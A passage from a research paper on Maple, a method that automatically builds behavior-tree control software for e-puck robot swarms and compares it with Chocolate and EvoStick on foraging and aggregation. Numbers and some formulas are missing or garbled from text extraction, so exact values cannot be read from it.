the application of behavior trees to swarm robotics is the absence of the notion of success and failure in the low-level behaviors typically adopted in swarm robotics. we believe that, in order to develop low-level behaviors that are appropriate for behavior trees, one should overcome technical issues (that is, use robots whose hardware capabilities enable them to infer natural termination criteria) and a cultural legacy. behavior trees in this section, we give a brief description of behavior trees and their functioning. we adopt the framework that marzinotto et al. ( ) proposed to unify the different variants of behavior trees described in the literature. we refer the reader to the original description of the framework for more details. the original idea of behavior trees was proposed for the halo video game (isla, ). since then, behavior trees have found applications in many computer games, for example, spore and bioshock (champandard, dawe & hernandez-cerpa, ). recently, behavior trees have attracted the interest of the research community. initial research focused on the automatic generation of behaviors in video games, for example, the commercial game defcon (lim, baumgarten & colton, ) and the mario ai competition (perez et al., ). even more recently, behavior trees have found applications in the control of unmanned aerial vehicles (Ögren, ), surgical robots (hu et al., ), and collaborative robots (paxton et al., ). ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a behavior tree is a control architecture that can be expressed as a directed acyclic graph with a single root. with a fixed frequency, the root generates a tick that controls the execution. the tick is propagated through the tree and activates each node that it visits. the path that the tick takes through the tree is determined by the inner nodes, which are called control-flow nodes. once the tick reaches a leaf node, a condition is evaluated or an action is performed. then, the leaf node immediately returns the tick to its parent together with one of the following three values: success, failure, or running. a condition node returns success, if its associated condition is fulfilled; failure, otherwise. an action node performs a single control step of its associated action and returns success, if the action is completed; failure, if the action failed; running, if the action is still in progress. when a control-flow node receives a return value from a child, it either immediately returns this value to its parent, or it continues propagating the tick to the remaining children. there are six types of control-flow nodes: sequence (!): ticks its children sequentially, starting from the leftmost child, as long as they return success. because it does not remember the last child that returned running, it is said to be memory-less. once a child returns running or failure, the sequence node immediately passes the returned value, together with the tick, to its parent. if all children return success, the node also returns success. selector (?): memory-less node that ticks its children sequentially, starting from the leftmost child, as long as they return failure. once a child returns running or success, the selector node immediately passes the returned value, together with the tick, to its parent. if all children return failure, the node also returns failure. sequence� (!�): version of the sequence node with memory: resumes ticking from the last child that returned running, if any. selector� (?�): version of the selector node with memory: resumes ticking from the last child that returned running, if any. parallel (!!): ticks all its children simultaneously. it returns success if a defined fraction of its children return success; failure if the fraction of children return failure; running otherwise. decorator (δ): is limited to a single child. it can alter the number of ticks passed to the child and the return value according to a custom function defined at design time. in the context of automatic modular design, the most important properties of behavior trees are their enhanced expressiveness, the principle of two-way control transfers, and their inherent modularity (Ögren, ; colledanchise & Ögren, ). Ögren and coworkers have shown that behavior trees generalize finite-state machines only with selector and sequence nodes (Ögren, ; marzinotto et al., ). with parallel nodes, behavior trees are able to express individual behaviors that have no representation in classical finite-state machines. the principle of two-way control transfers implies that the control can be passed from a node to its child, and can also be returned from the child, along with information about the state of the system. finally, behavior trees are inherently modular: each subtree is a valid behavior tree. due to this property, behavior trees can be easily manipulated as one can move, modify, or prune subtrees without compromising the structural integrity of the behavior tree. the modularity of behavior trees could simplify the conception of tailored optimization algorithm based on local manipulations. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ automode—maple maple is an automatic modular design method that generates control software in the form of behavior trees. it does so by selecting, combining, and fine-tuning a set of predefined modules: the six low-level behaviors and the six conditions defined by francesca et al. ( ) for vanilla, and later used in chocolate (francesca et al., ). we introduce maple with the purpose of exploring the use of behavior trees as a control architecture in the automatic modular design of robot swarms. to conduct a meaningful study on the potentials of behavior trees as a control architecture, we compare maple with chocolate, a state-of-the-art automatic modular design method that generates control software in the form of probabilistic finite-state machines (francesca et al., ; francesca & birattari, ). we conceived maple to be as similar as possible to chocolate so that differences in performance between the two methods can only be attributed to the different control architecture they adopt. maple and chocolate generate control software for the same robotic platform, they have at their disposal the same set of modules, and they use the same optimization algorithm. in a probabilistic finite-state machine generated by chocolate, a state is an instantiation of a low-level behavior and a transition is an instantiation of a condition. because low-level behaviors (the states of the finite-state machine) are executed until an external condition (a transition) is enabled, they do not have inherent termination criteria. the absence of natural termination criteria implies that, when used as action nodes in a behavior tree generated by maple, the low-level behaviors of chocolate can only return running. as a result, part of the control-flow nodes of behavior trees do not work as intended. with maple, we chose to use the unmodified modules of chocolate, and force the generated behavior trees to adopt a restricted structure that only uses a subset of the control-flow nodes. robotic platform maple produces control software for the e-puck robot (mondada et al., ) equipped with several extension boards (garattoni et al., ), including the range-and-bearing board (gutiérrez et al., ). the predefined modules on which maple operates have access to a subset of the capabilities of the e-puck robot that are formally defined by the reference model rm . (hasselmann et al., )—see table . table reference model rm . (hasselmann et al., ). sensors and actuators of the e-puck robot. period of control cycle: ms. sensor/actuator variables values proximity proxi, with i ϵ { ,…, } [ , ] light lighti, with i ϵ { ,…, } [ , ] ground groundi, with i ϵ { ,…, } {black, gray, white} range-and-bearing n { ,…, } vd ([ , . ]m, [ , π] radian) wheels vl, vr [− . , . ]ms − ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the modules can adjust the velocity of the two wheels (vl and vr) of the robot, detect the presence of obstacles (proxi), measure the intensity of the ambient light (lighti), and identify whether the ground situated directly beneath the robot is black, gray, or white (groundi). the modules have also access to the number n of surrounding peers within a range of up to . m, as well as to a vector vd ¼ pn m¼ =rm; ffbmð Þ where rm and are distance and bearing of the m-th neighboring peer (spears et al., ). set of modules maple has at its disposal the same set of modules used by vanilla (francesca et al., ) and chocolate (francesca et al., ). some of the modules are parametric so that the optimization algorithm can fine-tune their behavior on a per-mission basis. the set comprises six low-level behaviors and six conditions. a low-level behavior is a way in which the robot operates its actuators in response to the readings of its sensors. a condition is a context that the robot perceives via its sensors. conditions contribute to determine which behavior is executed at any moment in time. in the behavior trees generated by maple, an action node is selected among the six low-level behaviors and a condition node is selected among the six conditions. in the following, we briefly describe the low-level behaviors and conditions. for the details, we refer the reader to their original description given by francesca et al. ( ). low-level behaviors exploration: if the front of the robot is clear of obstacles, the robot moves straight. when an obstacle is perceived via the front proximity sensors, the robot turns in-place for a random number of control cycles drawn in ; …; sf g. τ is an integer parameter ; …; f g. stop: the robot does not move. phototaxis: the robot moves towards the light source. if no light source is perceived, the robot moves straight while avoiding obstacles. anti-phototaxis: the robot moves away from the light source. if no light source is perceived, the robot moves straight while avoiding obstacles. attraction: the robot moves towards its neighboring peers, following αvd, where the parameter a ; ½ � controls the speed of convergence towards them. if no peer is perceived, the robot moves straight while avoiding obstacles. repulsion: the robot moves away from its neighboring peers, following −αvd, where the parameter a ; ½ � controls the speed of divergence. if no peer is perceived, the robot moves straight while avoiding obstacles. conditions black-floor: true with probability β, if the ground situated below the robot is perceived as black. gray-floor: true with probability β, if the ground situated below the robot is perceived as gray. white-floor: true with probability β, if the ground situated below the robot is perceived as white. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ neighbor-count: true with probability z nð Þ ¼ þ egðn�nÞ � �� , where n is number of detected peers. the parameters g ; ½ � and n ; …; f g control the steepness and the inflection point of the function, respectively. inverted-neighbor-count: true with probability � z nð Þ. fixed-probability: true with probability β. control software architecture the low-level behaviors of chocolate have no inherent success or failure criterion and can only return running when used as action nodes in behavior trees. to use chocolate’s low-level behaviors as action nodes, we constrained maple to generate behavior trees that have a particular, restricted structure. this restricted structure only uses a subset of the control-flow nodes of the classical implementation of behavior trees. the top-level node is a sequence� node (!�) and can have up to four selector subtrees attached to it. a selector subtree is composed of a selector node (?) with two leaf nodes: a condition node as the left leaf node, and an action node as the right leaf node. figure illustrates a behavior tree with the restricted structure adopted here. we limit the maximal number of subtrees, and therefore the number of action nodes, to four so as to mimic the restrictions of chocolate, which generates probabilistic finite-state machines with up to four states. in the example of fig. , the left-most selector subtree (highlighted by the dashed box) is first ticked and action a is executed as long as condition c returns failure. if condition c returns success, the top-level node (!�) ticks the second selector subtree, and a is executed, provided that c returns failure. because the top-level node is a control-flow node with memory, the tick will resume at the second subtree in the following control cycle. a is therefore executed as long as c returns failure. although actions a and a are not in adjacent sub-trees, a can be executed directly after a granted that conditions c , c , and c return success and c returns failure. when condition c of the last selector subtree returns success, the top-level node of the tree also returns success and no →∗ ? c a ? c a ? c a ? c a figure illustration of a behavior tree with restricted structure that maple can produce. maple generates a behavior tree by defining first the number of selector subtrees (highlighted by the dashed box), and by then specifying and fine-tuning the condition and action nodes that compose each selector subtree. full-size doi: . /peerj-cs. /fig- ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ action is performed. in this case, the tree is ticked again at the next control cycle, and the top-level node ticks the left-most selector subtree again. the size of the space spanning all possible instance of control software that can be produced by maple is in o jbj jcj Þ � , where b and c are the sets of low-level behaviors and conditions, respectively (kuckling et al., b). the search space can be formally defined as: t; #nð Þ; nð Þi ; #li; lij; l p ij h i ; with i ¼ ; …; #nð Þ n o ; j ¼ ; …; #lif g; where t sequence�f g is the type of the top-level node; #nð Þ ; …; f g is the number of level nodes; n ð Þ i selectorf g is the type of the level node i; #li f g is the number of leafs of node i; lij is the type of the j-th leaf of node i, with li c and li b; and lpij are the parameters of leaf lij. optimization algorithm maple uses iterated f-race (balaprakash, birattari & stützle, ; lópez-ibáñez et al., ) as an optimization algorithm. iterated f-race searches the space of all possible candidate solutions for the best one according to a mission-specific measure of performance. the iterated f-race algorithm comprises multiple steps, each of which is reminiscent of a race. in the first race, a uniformly distributed set of candidate solutions is sampled. these candidates are initially evaluated on a set of different instances. typically, an instance describes the configuration of the arena at the beginning of an experiment (that is, positions and orientations of the robots, positions of eventual obstacles or objects of interest, or color of the floor). after the initial set of evaluations is performed, a friedman test (friedman, , ; conover, ) is performed on the performance obtained by the candidate solutions. the candidate solutions that perform significantly worse than at least another one are discarded. the algorithm keeps evaluating the remaining candidate solutions on new instances and discards those that are statistically dominated. the race terminates when only one surviving candidate solution remains, or when the maximal number of evaluation defined for the race is reached. in the following races, the new set of candidate solutions is sampled with a distribution that gives higher priority to solutions that are similar to the surviving solutions of the previous one. experimental setup in this section, we describe the experimental setup that is common to the three studies conducted. in particular, we describe the previously proposed automatic design methods against which we compare maple, the missions for which we generate control software, and the protocol we follow. further details are given in each of the sections dedicated to the specific studies. automatic design methods in study and , we compare maple with two previously proposed methods: chocolate and evostick. maple is described in the previous section. here, we briefly describe ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chocolate and evostick: we refer the reader to francesca et al. ( , ) for the details. chocolate (francesca et al., ) is an automatic modular method that selects, combines, and fine-tunes the same twelve predefined modules as maple. in chocolate, the architecture of the control software is a probabilistic finite-state machine. in this context, a state is an instance of low-level behavior and an edge is an instance of condition. similarly to maple, chocolate adopts iterated f-race as an optimization algorithm. with chocolate, the search space of iterated f-race is restricted to probabilistic finite-state machines that comprise up to four states, and up to four outgoing edges per state. the size of the search space defined by the control architecture of chocolate is in oðjbj jcj Þ, where b and c are the sets of low-level behaviors and of conditions, respectively (kuckling et al., b). evostick (francesca et al., , ) is a straightforward implementation of the evolutionary swarm robotics approach. in evostick, the architecture of the control software is a fully-connected, single layer, feedforward neural network. the neural network comprises input nodes for the readings of the sensors described in the reference model rm . : for the proximity sensors, for the light sensors, for ground sensors, and for the range-and-bearing board. out of the five input nodes dedicated to the range-and- bearing board, one is allocated to the number of detected peers and the four others are allocated to the scalar projection of the vector vd on four unit vectors. the neural network comprises output nodes controlling the velocities of the wheels. the topology of the neural network is fixed, and an evolutionary algorithm fine-tunes the weights of the connections between the input and the output nodes. each weight is a real value in the range � ; ½ �. in evostick, the population is composed of individuals that are evaluated times per generation. missions we consider two missions: foraging and aggregation. the two missions must be performed in a dodecagonal arena delimited by walls and covering an area of . . the swarm is composed of e-puck robots that are distributed uniformly in the arena at the beginning of each experimental run, and we limit the duration of the missions to . foraging because the robots cannot physically carry objects, we consider an idealized form of foraging. in this version, we reckon that an item is picked up when a robot enters a source of food, and that a robot drops a carried item when it enters the nest. a robot can only carry one item at a time. in the arena, a source of food is represented by a black circle, and the nest is represented by the white area (see fig. ). the two black circles have a radius of . , they are separated by a distance of . , and are located at . from the white area. a light source is placed behind the white area to indicate the position of the nest to the robots. the goal of the swarm is to retrieve as many items as possible from the sources to the nest. in other words, the robots must go back and forth between the black circles and ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the white area as many times as possible. the objective function is ff = i where i is the number of items deposited in the nest. aggregation the swarm must select and aggregate in one of the two black areas (see fig. ). the two black areas have a radius of . and are separated by a distance of . . the objective function is fa = max(nl, nr)/n, where nl and nr are the number of robots located on the figure foraging. (a) simulated arena. (b) real arena. the red glow visible in the picture is due to a red gel we placed in front of the light source. with the red gel, the light does not disturb the overhead camera that is used to track the position of the robots and compute the objective function. yet, the light is still perceived by the robots that use their infrared sensors to sense it. full-size doi: . /peerj-cs. /fig- figure aggregation. the objective function fa is computed as the maximal fraction of robots situated either on the left area (nl/n) or on the right area (nr/n). it is evaluated at the end of an experimental run. (a) simulated arena, with fa = . as robots stand on the left black area (nl = ) and no robot stands on the right one (nr = ). (b) real arena, with fa = . as nl = and nr = . full-size doi: . /peerj-cs. /fig- ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ left and right black area, respectively; and n is the total number of robot in the swarm. the objective function is computed at the end of a run and is maximized when all the robots have aggregated in the same black area. dummy control software throughout the three studies, we compare the performance of automatically generated control software to the one of two instances of control software—one per mission—that we call “dummy” control software. they perform a simple, naive, and trivial behavior that we can consider as a baseline for each mission. with this comparison, we assess whether the automatic design methods can produce behaviors that are more sophisticated than trivial solutions. to produce the two instances of dummy control software, we used the same low-level behaviors and conditions that maple and chocolate have at their disposal to generate control software. for foraging, we consider a strategy in which the robots move randomly in the environment. we obtained this strategy by using the low-level behavior exploration. for aggregation, we consider a strategy in which the robots explore the environment randomly, and stop when they encounter a black spot. we obtained this strategy by combining the modules exploration, black-floor, and stop. to fine-tune the parameters of the modules, we used iterated f-race with a design budget of k simulation runs. methodology to account for the stochasticity of the design process, we execute each design method several times, and therefore produce several instances of control software. the number of executions of the design methods varies with the study. to evaluate the performance of a design method, each instance of control software is executed once in simulation. in study , each instance of control software is also executed once in reality. simulations are performed with argos , version beta (pinciroli et al., ; garattoni et al., ). in the experiments with the robots, we use a tracking system comprising an overhead camera and qr-code tags on the robots to identify and track them in real time (stranieri et al., ). with this tracking system, we automatically measure the performance of the swarm, and we automatically guide the robots to the initial position and orientation for each evaluation run. during an evaluation run, the robots may tip over due to collisions. to avoid damages, we intervene to put them upright. in the three studies, we present the performance of the design methods in the form of box-and-whiskers boxplots. in addition, we present the median performance of the dummy control software assessed in simulation with a dotted horizontal line. in each study, statements such as “method a is significantly better/worse than b” imply that significance has been assessed via a wilcoxon rank-sum test, with confidence of at least %. the instances of control software produced, the experimental data collected in simulation and in reality, and videos of the behavior displayed by the swarm of physical robots are available online as supplemental material (ligot et al., ). ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ study : performance in simulation and reality in this section, we evaluate maple’s ability to produce control software that crosses the reality gap satisfactorily. to do so, we compare the performance of control software generated by three design methods—maple, chocolate and evostick—both in simulation and in reality. previous research (francesca et al., ) indicates that chocolate crosses the reality gap more satisfactorily than evostick. francesca et al. ( , ) argue that chocolate’s ability to cross the reality gap is mainly due to its modular nature. because maple shares with chocolate the same modular nature and differs from it only in the control architecture adopted, we expect maple to also experience smaller performance drops than evostick. we executed each design method times, and thus produced instances of control software. the design budget allocated to each method is k simulation runs. the results are depicted in fig. . foraging in simulation, the performance of the control software produced by the three automatic design methods is similar, and is significantly better than the one of the dummy strategy. in reality, evostick is significantly worse than maple and chocolate. the performance of all three methods drops significantly when passing from simulation to reality, but evostick suffers from the effects of the reality gap the most. see fig. a. most of the instances of control software generated by maple and chocolate display similar strategies: the robots explore the environment randomly and once a black area (that is, a source of food) is found, they navigate towards the light to go back to the white a maple evostickchocolate p er fo rm an ce b maple evostickchocolate . . . . . . figure results of study . the gray boxes represent the performance assessed in simulation; the white boxes the one assessed in reality. the dotted line represents the median performance of the dummy control software assessed in simulation. full-size doi: . /peerj-cs. /fig- ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ area (that is, the nest). one instance of control software produced by maple uses the anti-phototaxis low-level behavior to leave the nest faster once an item has been dropped. three instances of control software produced by chocolate display an even more sophisticated strategy: the robots only explore the gray area in the search for the sources of food. in other words, the robots always directly leave the nest if they enter it, independently of whether they dropped an item or not. in simulation, the instances of control software generated by evostick display drastically different behaviors than the ones produced by maple and chocolate: the robots navigate following circular trajectories that cross at least one food source and the nest. in reality, the robots follow circular trajectories that are much smaller than those displayed in simulation. as a result, the robots tend to cluster near the light. contrarily to maple and chocolate, and with the exception of few cases, the instances of control software generated by evostick do not display an effective foraging behavior. aggregation in simulation, evostick performs significantly better than maple and chocolate, which show similar performance. in reality, we observe an inversion of the ranks: maple and chocolate perform significantly better than evostick. indeed, the performance of evostick drops considerably, whereas the performance drop experienced by maple and chocolate is smaller. see fig. b. the instances of control software produced by maple and chocolate efficiently search the arena and make the robots stop on the black areas once they are found. in simulation, with the control software produced by evostick, the robots follow the border of the arena and then adjust their trajectory to converge towards neighboring peers that are already situated on a black spot. in reality, the control software generated by evostick does not display the same behavior: robots are unable to find the black areas as efficiently as in simulation because they tend to stay close to the borders of the arena. moreover, the robots tend to leave the black areas quickly when they are found. although the three design methods perform significantly better than the dummy control software in simulation, none of the methods produced control software that makes the physical robots reach a consensus on the black area on which they should aggregate. study : performance versus design budget in this section, we investigate the performance of maple and chocolate across different design budgets. because the search space (that is, all instances of control software that can be generated) of chocolate is significantly larger than the one of maple—o jbj jcj � � and o jbj jcj � � , respectively (kuckling et al., b)—we expect maple to converge to high performing solutions faster than chocolate. we consider design budgets: . k, k, k, k, k and k simulation runs. for each design budget, we executed each design method times, and thus produced instances of control software. in total, the two design methods have been executed times each. the results are depicted in fig. . ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ foraging the performance of the methods show different trends when the design budget increases. for maple, there is a significant improvement of the performance between design budgets of k and k, and between k and k simulation runs. for chocolate, the performance increases significantly between design budgets of k and k, k and k, and k and k simulation runs. see fig. a. with very small design budgets— . k and k simulation runs—maple and chocolate show similar performance: they are unable to find solutions that are better than the dummy control software. with a small design budget— k simulation runs—maple performs significantly better than chocolate. also, with k simulation runs, chocolate and the dummy control software show similar performance. with a large design budget— k runs— chocolate performs significantly better than maple. indeed, the instances of control software generated by chocolate display a more sophisticated foraging strategy than those generated by maple: to increase the rate of discovery of the food sources, the robots only explore the gray area of the arena, and stay away from the nest. it appears that, with maple’s restrictions on the structure of the behavior trees, this strategy cannot be produced. indeed, in the instances of control software that can be produced by maple, only one condition can terminate the execution of the action performed, whereas in the ones produces by chocolate, up to four conditions can. therefore, with maple, the robots are forced to explore the whole arena until they find the food sources (that is, the black circles). however, it is important to notice that the behavior trees generated by maple with a . k k k k k k p er fo rm an ce design budgets (simulation runs) b . k k k k k k . . . . . . design budgets (simulation runs) figure results of study . performance of maple and chocolate over multiple design budgets, expressed in number of simulation runs. light gray boxes represent the performance of maple, dark gray boxes the one of chocolate. the dotted line represents the median performance of the dummy control software. full-size doi: . /peerj-cs. /fig- ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a design budget of k simulation runs are only outperformed by probabilistic finite-state machines when k simulation runs are allocated to chocolate. aggregation the performance of the control software generated by both methods increase almost constantly with the design budget. also for this mission, chocolate requires a design budget of at least k simulation runs in order to generate control software that is significantly better than the dummy control software. contrarily, maple only requires k simulation runs. with k and k simulation runs, maple outperforms chocolate. for larger design budgets, maple and chocolate show similar performance. see fig. b. although the design budgets considered allow the two methods to outperform the dummy control software in multiple occasions, neither of them generated control software that completed the mission satisfactorily. indeed, the maximal median performance obtained is fa ¼ : , which means that only out of the robots were on the same black spot. study : maple and some of its possible variants in this section, we explore the changes in performance when variations to the control architecture of maple are introduced. our exploration is not exhaustive: we only consider variants that generate behavior trees whose structure is similar to the one of the behavior trees generated by maple. we limit our exploration to variants that generate trees with: (i) levels (top-level, inner, and leaf nodes); up to branches connected to the top-level node; and exactly leaf nodes per branch. many variants are possible, however, because the action nodes of maple can only return running, some variants are unable to combine low-level behaviors into meaningful and elaborate individual behaviors. descriptions of these variants, as well as illustrations, are given as part of supplemental material (ligot et al., ). in the following, we describe variants that are promising and explain how they behave with the modules considered in maple. we tested the most promising variants by generating control software and evaluating their performance in simulation, and report the results. alternative behavior tree structures icfn (inverted control-flow nodes): the control-flow nodes are inverted with regard to the ones of maple: the top-level node is a selector� and the inner nodes are sequence nodes. see fig. a. in this variant, the action node of a subtree is executed as long as the condition returns success, whereas it is executed until the condition returns success in maple. nd (negation decorator): a negation decorator node can be instantiated above a condition node. see fig. b. the negation decorator returns failure (success) if the condition returns success (failure). with the set of conditions available, it is particularly interesting to place a negation decorator above a condition on the color of the ground perceived (that is black-, gray-, or white-floor). indeed, placing a negation decorator node above a neighbor-count condition is equivalent to having an inverted-neighbor-count condition, and vice versa. similarly, a negation decorator above a fixed-probability ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ condition with ρ is equivalent to a fixed-probability with − ρ. however, a negation decorator above a condition on a given color is equivalent to assessing the conditions for the two other colors simultaneously. fl (free leaves): each leaf node is to be chosen between condition and action nodes. see fig. c. four pairs of leaf nodes are possible: condition–condition (see first branch), condition–action (which corresponds to the leaf pair imposed in maple, see second branch), action–condition (see third branch), and action–action (see fourth branch). for each subtree, the optimization algorithm is free to chose any pair of leaf nodes. the variant can express disjunction of conditions: a branch following a condition– condition leaf pair is ticked if the first or the second condition is met. however, the variant introduces dead-end states: when an action on the left hand side of a leaf pair is ticked, the action is executed for the remaining of the simulation run. ca|cc (condition–action or condition–condition): the right-hand side leaf node can be a condition or an action node. two pairs of leaf nodes are thus possible: condition–action, condition–condition. with respect to fl, this variant can also express disjunction of conditions, but does not allow for dead-end states. ?∗ → c a → c a a →∗ ? δ c a ? c a b →∗ ? c c ? c a ? a c ? a a c figure a few examples of maple’s variants. (a) variant icfn (inverted control flow nodes), (b) variant nd (negation decorator), (c) variant fl (free leaves). the number of branches connected to the top-level node, and their order, has been chosen arbitrarily. full-size doi: . /peerj-cs. /fig- ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sp (success probability): each action node has a probability ρ to return success. the probability ρ is a real value in the range ; ½ � and is tuned by the optimization process. with this probability, we simulate the capability of the action nodes to assess if the low-level behaviors are successfully executed. results for each variant, we produced instances of control software, all generated by the same optimization process—iterated f-race—with a design budget of k simulation runs. we compare the performance of the variants to the one of maple. foraging none of the variants outperformed maple. maple, nd, and ca|cc perform similarly; moreover, they outperform icfn, fl, sp, and the dummy control software. the variants icfn, fl, and the dummy control software show similar performance. see fig. a. all the instances of control software generated by maple show similar behaviors: the robots explore the arena until they find one of the food sources, then navigate towards the nest using the light as a guidance. in some cases, the robots use the anti-phototaxis low-level behavior to directly leave the nest once they have deposited an item. with variant nd, we can manually design control software that displays an elaborate strategy: the robots increase the rate at which they discover food sources by only exploring the gray area of the arena. this behavior cannot be expressed by maple (see study ). an example of a behavior tree adopting variant nd that displays this strategy is illustrated in section of the supplemental material (ligot et al., ). in this example, the elaborate a maple fl spicfn nd ca|cc p er fo rm an ce b maple fl spicfn nd ca|cc . . . . . . figure results of study . performance in simulation of different variants of maple. the dotted line represents the median performance of the dummy control software. full-size doi: . /peerj-cs. /fig- ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ strategy only emerges if the success probability of the condition node below the negation decorator is set to . indeed, if the success probability is slightly lower, the behavior displayed is radically different, and more importantly, inefficient. it appears that, with the allocated budget, this necessary condition makes it unlikely for iterated f-race to produce this strategy. iterated f-race was not able to take advantage of the disjunction of conditions that is available in ca|cc to find better solutions that those of maple. indeed, we are unable to do so ourself. however, the increased search space of ca|cc does not hinder the optimization process as results obtained are similar to those of maple. in variant sp, the success probabilities, together with the conditions, are termination mechanisms for the subtrees. the additional termination mechanisms makes it harder for iterated f-race to exploit correlations between conditions and actions that lead to behaviors as efficient as those generated by maple. most of the produced control software rely essentially on the exploration low-level behavior. with variant icfn, one can generate a behavior tree that expresses the same elaborate strategies that can be generated with variant nd (see section of the supplemental material (ligot et al., ) for an example). however, icfn is faced with a similar problem as nd: the success probability of the conditions needs to be set to in order for that elaborate strategy to emerge. with a success probability set to a lower value, the condition node might return failure even though its condition is met, and the subtree might therefore terminate prematurely. the allocated design budget was not large enough for iterated f- race to find behavior trees with meaningful connections between the conditions and behaviors, which resulted in poor performance. the performance of the variant fl shows the highest variance. sometimes, the behavior trees generated are similar to those produced by maple. however, in many cases, the left leaf node of subtrees is an action node with an associated exploration low-level behavior. once this node is reached, this low-level behavior is executed until the end of the experimental run. as a result, the performance observed is similar to the one of the dummy control software. aggregation variant icfn outperforms maple. maple, fl, nd, and sp show similar performance. maple outperforms ca|cc. every variant produced behavior trees that outperform the dummy control software. see fig. b. all the instances of control software generated by maple and the different variants make use of exploration and attraction as low-level behaviors to efficiently search for black spots. maple and fl use stop as a low-level behavior in order to keep the robots on the discovered spot. contrarily, the majority of the behavior trees adopting variant icfn, nd, sp, and ca|cc do not contain the stop low-level behaviors as action nodes. instead, they take advantage of the fact that, when no action node is executed, the robot stands still. icfn is the only variant for which iterated f-race was able to exploit this feature to outperform maple. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related work originating from game development (isla, ), behavior trees have found recent applications in artificial intelligence (perez et al., ) and robotics. most of the robotics research focuses on their use in manipulators. bagnell et al. ( ) used behavior trees to control a manipulator to perform simple manipulation tasks. hu et al. ( ) used them to control the raven-ii surgical robot to perform an abstract version of tumor ablation surgery. behavior trees have also been used as a control software for mobile robotics systems. marzinotto et al. ( ) designed a behavior tree to make a nao robot move towards a table and grasp an object. in all of the presented studies, behavior trees have been manually designed. to the best of our knowledge, the work of jones et al. ( ) is the first and only application of behavior trees in the context of automatic off-line design of robot swarms , . the authors proposed a method based on genetic programing that automatically generates control software for a swarm of kilobots in the form of behavior trees. the method has been tested on a foraging task in simulation and in reality. their results suggest that behavior trees can be used as a control architecture in swarm robotics. besides the different optimization processes adopted in the method of jones et al. ( ) and in maple, another major difference between the two methods lies in the action nodes used. in the method proposed by jones et al. ( ), low-level behaviors are atomic commands: for example, move forward, turn left/right, or store data. contrarily, the low-level behaviors that can be combined by maple are more complex actions. regardless of this difference, the low-level behaviors of the two methods lack natural success or failure termination criteria. to use their atomic low-level behaviors as action nodes in behavior trees, jones et al. ( ) programed the action nodes such that they return success after the second execution of the behavior, but failure is never returned. this solution allowed their method to have no restrictions on the selection of the control-flow nodes. in maple, the action nodes can only return running, but the structure of the behavior trees, and the control-flow nodes, are restricted such that an external condition terminates the execution of an action. conclusions in this article, we presented maple: an automatic modular design method that generates control software for robot swarms in the form of behavior trees. maple is part of the automode family: it generates control software by selecting, combining, and fine-tuning a set of predefined modules. previous instances of automode have all used probabilistic finite-state machines as a control architecture. in comparison to finite-state machines, behavior trees offer a number of appealing features. however, most of these features only emerge if the action nodes return their states of execution, that is, if the robot is able to tell whether the low-level behavior it executes is terminated successfully, could not execute normally, or still requires time to terminate. in the context of swarm robotics, the simple and reactive robots typically used are not able to determine the state of execution of the low-level behaviors they operate. with maple, we have investigated the use of behavior trees as a control architecture in the automatic modular design for robot swarms, and have shown that they can still be used even if the low-level behaviors they combine do not the authors also adapted their system for the onboard evolution of a swarm of nine xpucks (jones et al., ). neupane & goodrich ( ) proposed a method based on the grammatical evolution of behavior trees for robot swarms, but their experiments were conducted in simulation only and the focus of the paper is mainly ported on the evolutionary approach rather than on behavior trees. ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ return success nor failure. it is our contention that, despite their potential is not exploited in the context of the automatic modular design of robot swarms, behavior trees are a control architecture that is worth exploring. in particular, we reckon that the inherent modularity they offer could be exploited by future automatic modular design methods. in fact, behavior trees can be easily manipulated without compromising their structural integrity, which allows for the use of tailored optimization algorithms based on local manipulations. we devised maple to be as similar as possible to chocolate: the two methods share the same optimization algorithm, the same set of predefined modules, and generate control software on the basis of the same reference model. the only difference between maple and chocolate is the control architecture adopted. we conducted three studies based on two missions: foraging and aggregation to assess the implications of adopting behavior trees as a control architecture. in the first study, we assessed maple’s ability to cross the reality gap satisfactorily by comparing its performance in simulation and in 